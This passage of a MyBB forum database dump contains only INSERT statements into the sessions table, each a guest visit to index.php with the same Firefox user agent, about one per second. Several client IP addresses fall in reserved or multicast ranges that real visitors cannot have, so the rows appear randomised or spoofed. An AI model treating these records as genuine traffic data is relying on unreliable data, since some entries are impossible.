('98cd184c6f3631857189e2a2ea4696c8', '0', '28.195.179.196', '1352772312', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('116c18cc1ebc009efe60e959c71487e7', '0', '147.234.200.147', '1352772313', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f6d2860269ed36601d4cc654a54b4a7', '0', '83.113.127.181', '1352772313', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4faf8aea2515d1119a994fecce64a801', '0', '187.114.30.134', '1352772314', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('81593014293b837d72dfad3a37e616e1', '0', '244.69.103.117', '1352772315', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('52ced8492bed4443f55f309beaeaa7b5', '0', '109.169.52.184', '1352772315', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5b6ff928903a978a88067ad8177162e3', '0', '7.231.115.2', '1352772316', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('41580aa519bea2d1b4e6d66f37befac2', '0', '147.96.83.128', '1352772317', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6556be43a0603fc82c913dac6982c275', '0', '4.156.43.160', '1352772318', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c729dad78b16364bcc162f37e1aa5100', '0', '14.144.124.78', '1352772318', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('07967bb6deb481f2afbecb5ff8fa771d', '0', '75.32.89.42', '1352772319', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('79b8be53eff9ad0447085a71155d2ce6', '0', '33.177.159.135', '1352772320', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46cda273e0521268c855529d692e5e90', '0', '134.177.72.75', '1352772322', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6151ce5022fa7e33451c810cab173ece', '0', '239.117.23.244', '1352772322', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0263e8b29b181e41614ba6cd1c353022', '0', '153.162.178.232', '1352772323', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5e9fd9f497e8f8a6d5d67ef84d7b3dde', '0', '115.251.150.158', '1352772324', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f27dd9cea3baccef34e329abc663f992', '0', '37.251.103.211', '1352772324', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b4d21a4b481db467dd1aafd6b0671d8f', '0', '115.81.204.209', '1352772325', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9bc75071892589b94b931955710b28d2', '0', '91.74.242.60', '1352772326', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('61eec406cfec51d5c3a4761a9f6a2f91', '0', '161.133.89.177', '1352772327', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('76aaaf41509e849f8cc38d8bf8cd9506', '0', '63.227.217.140', '1352772328', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b332648aff286b70f0328966d6b5f72', '0', '34.198.159.88', '1352772328', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3a84e0f95fdde8b09b2ad2be7778e75c', '0', '245.149.99.143', '1352772329', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0dec1df0eda40583e291bad87876ab1b', '0', '76.224.209.53', '1352772330', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aab04a26a231dbb2f77757c35526bb26', '0', '169.34.67.143', '1352772332', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('753eed87cfb408b77ea74980d4ea77c5', '0', '185.130.65.180', '1352772332', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('80cdb85d035689c9c137e1ed22c067f8', '0', '247.156.48.40', '1352772332', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb86b1a916835b486cdfaf246a5d033f', '0', '200.62.48.20', '1352772333', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49bd273a01e55e886846fed4711320f6', '0', '241.108.203.65', '1352772334', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f99e636e4574a68ddab9492eba9736c', '0', '52.155.60.185', '1352772334', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f5b90fa586af73afdfcbebb9fc86d53a', '0', '24.12.89.205', '1352772335', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a6290c0630dde864171febf883aca514', '0', '99.64.15.62', '1352772336', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b609faacb1c05cae81004aa08f81fc5', '0', '235.21.42.24', '1352772337', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('87b22fd43248546ffc4da80cf71e4e55', '0', '154.65.151.163', '1352772338', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('637d1742c8c5ad4ba89b6c6996a28673', '0', '17.131.219.11', '1352772339', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b35d6282b22cf92082ce62b0b596b4b', '0', '0.188.43.169', '1352772339', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f88c7c74d3f58dc253d01f4263bced58', '0', '178.230.57.157', '1352772340', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6cbcffee70d601991ace674f02efc324', '0', '106.84.178.194', '1352772341', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('28bc5cb88b3e0effaeda28e769e04a33', '0', '37.120.148.210', '1352772341', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('28e996298ffc9c13d7d3bc784a1b515b', '0', '20.52.22.171', '1352772342', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('97d6a6bd925d199ab7240894db1fcc16', '0', '112.251.192.158', '1352772343', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dbabfa920d75e59161ca65e740ce06d7', '0', '183.63.189.19', '1352772344', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c930396d5b5d846f2b7b6c2e049b99cb', '0', '115.8.63.49', '1352772344', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('862405be3cd844ad886dd33898cf8822', '0', '147.24.231.148', '1352772345', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('709a8d4e595898d7f9e2dbd15e0743dc', '0', '29.238.75.58', '1352772346', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4c94a194bd92c9f1946487f3ed32bf0', '0', '203.207.44.119', '1352772346', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('43eed5e37e489f75090d2c61f8a6c4a3', '0', '198.240.165.165', '1352772347', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e5cb2e9afed6224e6a342e0a8cf0ca6', '0', '96.36.111.15', '1352772348', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8678d07f7d9bac13c42198acb6f4787f', '0', '228.6.14.221', '1352772349', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('79a17b80c76bf1eee9fd7abfafb9b42d', '0', '42.243.61.223', '1352772350', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fa57c187337564663d6b4838f9f903fe', '0', '139.145.41.3', '1352772350', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ffb2f53463459038a9eeb274ae77f403', '0', '213.202.199.165', '1352772351', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea143d4289e6b8cc8864fa79c4e4a3cd', '0', '62.15.45.149', '1352772352', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6158354c7d2feb9c6faf4447f324f546', '0', '63.118.17.223', '1352772353', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('238f5b54e34094905bebd3256885d4c4', '0', '201.48.133.2', '1352772353', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9d7b04d0576e724ba57c454ae91561c9', '0', '254.223.46.21', '1352772354', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('458b76524419a80577154accb5766b1f', '0', '117.200.165.218', '1352772355', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8176daa5a86297445468975a2b5f0919', '0', '126.152.75.34', '1352772356', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a0e1d5d0ad39379ab36c62b0961834fc', '0', '24.131.85.150', '1352772357', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0e2855d9657347e5b496f0fed45a01c', '0', '35.51.69.123', '1352772357', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c6c1a2782a458b6ce2abefbf37c668ef', '0', '60.79.78.239', '1352772358', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('171b4c90de5908a56936c1b6b10932be', '0', '148.199.19.157', '1352772358', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('df6525a292ba8ee24c0741c9e743415b', '0', '178.94.52.248', '1352772359', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5f62561b69db7249833e003d67fb5fc9', '0', '98.51.16.187', '1352772360', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0fe209c2131d5281b2dbc227d9c5aca3', '0', '147.108.246.182', '1352772361', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ac73e2c7b534f18116774bf36fdde79a', '0', '143.209.157.7', '1352772362', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf009fc7e50c772715f37e21e5dfe669', '0', '16.3.153.237', '1352772363', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('26ed26f3543d8d11f51a889eff3f53cb', '0', '0.100.12.72', '1352772364', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b988d2ba6a78f6412a4256c66bab56a9', '0', '83.61.50.32', '1352772364', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('02de58d44ba70d86aa2b2e338284abd9', '0', '106.181.31.181', '1352772365', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ecc05b5d769869268ed71524e6700b1', '0', '6.240.194.179', '1352772366', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fbf96b8184e06a1b04d4fb600f83dba1', '0', '36.40.174.154', '1352772366', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9d531a3290b4d697f5c8701c0ccea26f', '0', '26.183.42.214', '1352772367', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8fcf7136658a44092b2e1d0174a778d0', '0', '85.249.244.89', '1352772368', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2f06401bcc74fd8d9b0ac02783e5ddc0', '0', '227.182.63.137', '1352772368', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('249420cd7e695f396ef447ff9b51f683', '0', '110.175.216.111', '1352772369', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b6ff000a358a4ab781a31e5c7803e43', '0', '127.199.30.126', '1352772370', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('531d5a9f9fcec07f0e39821b7ea1c3b1', '0', '192.226.210.179', '1352772371', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('56ace5d3861a0e7bbe04689466a5bd6f', '0', '201.138.210.72', '1352772372', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f15e77862a618893a28d74e896adb653', '0', '59.206.121.85', '1352772372', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; 